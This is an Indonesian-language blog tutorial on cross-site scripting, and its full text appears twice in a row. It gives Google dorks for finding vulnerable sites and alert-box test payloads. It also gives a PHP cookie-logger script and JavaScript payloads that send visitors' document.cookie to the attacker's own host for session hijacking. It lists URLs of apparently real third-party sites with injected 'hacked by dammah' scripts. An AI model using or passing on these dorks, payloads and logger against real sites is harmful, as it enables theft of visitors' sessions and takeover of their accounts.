XSS Attack - from Zero To Hero (^_^)
Oke kita mulai aja tanpa harus ada basa basi (^_^)
Apa itu XSS?
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.Tapi siapa sangka XSS bisa menciptakan serangan yg bsa menghancurkan website juga bsa membahyakan pengunjung. Xss di kembangkan lagi menjadi XSS Shell atau lebih terkenal dengan XSS Tunnel – Proxy. Nah ini penjelasannya.
APAKAH XSS SHELL?
XSS Shell adalah XSS backdoor dan zombie manager. Konsep ini pertama kali dikenalkan oleh XSS-Proxy (http://xss-proxy.sourceforge.net/). Biasanya dalam serangan XSS, penyerang memiliki satu target, dimana dengan XSS Shell anda dapat mengirim permintaan interaktif dan mendapatkan respon dari korban. Anda dapat menyisipkan backdoor pada halaman tersebut.
Anda bisa mencuri autektikasi pada website, Anda dapat memotong pembatasan IP di administrasi panel, Anda dapat DDoS beberapa sistem . Pada dasarnya alat ini menunjukkan bahwa Anda dapat berbuat lebih banyak dengan XSS (^_^) . . .
INI kita bahas nanti di pembahasan selanjutnya . . . (^_^)
Bagaimanakah menemukan Situs yang vulner?
mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menggunakan bantuan sesepuh kita yang paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan paman Google.hehehehe
kita menggunakan Dork dengan query sebagai berikut :
inurl:"search.php?q="
inurl:/gen_confirm.php?errmsg=
atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau Forum.
Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :
" alert("XSS") "
maka jika menampilkan dialog box seperti alert XSS maka site itu vulner . . .
Tapi apakah sekedar itu saja?
sekarang kita coba dengan metoda lain . . .
apakah site itu bisa dideface bro?
bisa saja, tergantung logika yang ada di kepala anda heheheh . . . . sekarang mari kita coba bagaimana mengattack site yang vulner itu.
ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
Adakah cara lain?
Metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri . . .Metode lain dengan Iframe Attack . . . di pembahasan berikutnya akan kita jelaskan (^_^)
dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :
" window.open( "http://www.facebook.com/" ) "
maka jika dieksekusi , kita akan di redirect ke situs facebook, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.
Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.
Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.
Nah buat pertama salin aja code dibawah ini :
$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>
Ok sekarang kita anggap lo dah memilikinya save dengan extensien Php dan upload ke server hosting, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini
" window.location = "http://hosting-lu.com/cookielogger.php?c="+document.cookie "
atau
" document.location = "http://hosting-lu.com/cookielogger.php?c="+document.cookie "
hingga otomatis url pada site berubah menjadi . . .
" http://Target.com/search.php?q=document.location
atau
"http://server-lu.com/cookielogger.php?c="+document.cookie "
Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :
" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Jan 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Jan 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Jan 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Jan 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Jan 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95
---------------------------------------------------------------------------------------------------------
exemple from newbie :
dork : inurl:/gen_confirm.php?errmsg=
target : http://www.micomprador.com/SourcingCenter/
atau :
http://www.all-from.eu/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/
atau :
http://www.veethitrade.com/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/
Note : anda hanya cukup mengganti coding setelah code berikut ini ?errmsg=<coding anda>cukup sekian tutor pendeknya . . . kita akan lanjutkan tutorial berikutnya dengan pembahasan yang lebih eXtrime . . . jika ada sobat yang mau melanjutkan tutor ini dipersilahkan dengan hormat.selamat berkarya . . . sampai jumpa di tutorial berikutnya (^_^)
Apa itu XSS?
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.Tapi siapa sangka XSS bisa menciptakan serangan yg bsa menghancurkan website juga bsa membahyakan pengunjung. Xss di kembangkan lagi menjadi XSS Shell atau lebih terkenal dengan XSS Tunnel – Proxy. Nah ini penjelasannya.
APAKAH XSS SHELL?
XSS Shell adalah XSS backdoor dan zombie manager. Konsep ini pertama kali dikenalkan oleh XSS-Proxy (http://xss-proxy.sourceforge.net/). Biasanya dalam serangan XSS, penyerang memiliki satu target, dimana dengan XSS Shell anda dapat mengirim permintaan interaktif dan mendapatkan respon dari korban. Anda dapat menyisipkan backdoor pada halaman tersebut.
Anda bisa mencuri autektikasi pada website, Anda dapat memotong pembatasan IP di administrasi panel, Anda dapat DDoS beberapa sistem . Pada dasarnya alat ini menunjukkan bahwa Anda dapat berbuat lebih banyak dengan XSS (^_^) . . .
INI kita bahas nanti di pembahasan selanjutnya . . . (^_^)
Bagaimanakah menemukan Situs yang vulner?
mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menggunakan bantuan sesepuh kita yang paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan paman Google.hehehehe
kita menggunakan Dork dengan query sebagai berikut :
inurl:"search.php?q="
inurl:/gen_confirm.php?errmsg=
atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau Forum.
Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :
" alert("XSS") "
maka jika menampilkan dialog box seperti alert XSS maka site itu vulner . . .
Tapi apakah sekedar itu saja?
sekarang kita coba dengan metoda lain . . .
apakah site itu bisa dideface bro?
bisa saja, tergantung logika yang ada di kepala anda heheheh . . . . sekarang mari kita coba bagaimana mengattack site yang vulner itu.
ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
Adakah cara lain?
Metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri . . .Metode lain dengan Iframe Attack . . . di pembahasan berikutnya akan kita jelaskan (^_^)
dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :
" window.open( "http://www.facebook.com/" ) "
maka jika dieksekusi , kita akan di redirect ke situs facebook, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.
Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.
Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.
Nah buat pertama salin aja code dibawah ini :
$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>
Ok sekarang kita anggap lo dah memilikinya save dengan extensien Php dan upload ke server hosting, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini
" window.location = "http://hosting-lu.com/cookielogger.php?c="+document.cookie "
atau
" document.location = "http://hosting-lu.com/cookielogger.php?c="+document.cookie "
hingga otomatis url pada site berubah menjadi . . .
" http://Target.com/search.php?q=document.location
atau
"http://server-lu.com/cookielogger.php?c="+document.cookie "
Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :
" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Jan 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Jan 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Jan 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Jan 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Jan 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95
---------------------------------------------------------------------------------------------------------
exemple from newbie :
dork : inurl:/gen_confirm.php?errmsg=
target : http://www.micomprador.com/SourcingCenter/
atau :
http://www.all-from.eu/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/
atau :
http://www.veethitrade.com/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/
Note : anda hanya cukup mengganti coding setelah code berikut ini ?errmsg=<coding anda>cukup sekian tutor pendeknya . . . kita akan lanjutkan tutorial berikutnya dengan pembahasan yang lebih eXtrime . . . jika ada sobat yang mau melanjutkan tutor ini dipersilahkan dengan hormat.selamat berkarya . . . sampai jumpa di tutorial berikutnya (^_^)
ngerti selet blog mu ini...
ReplyDelete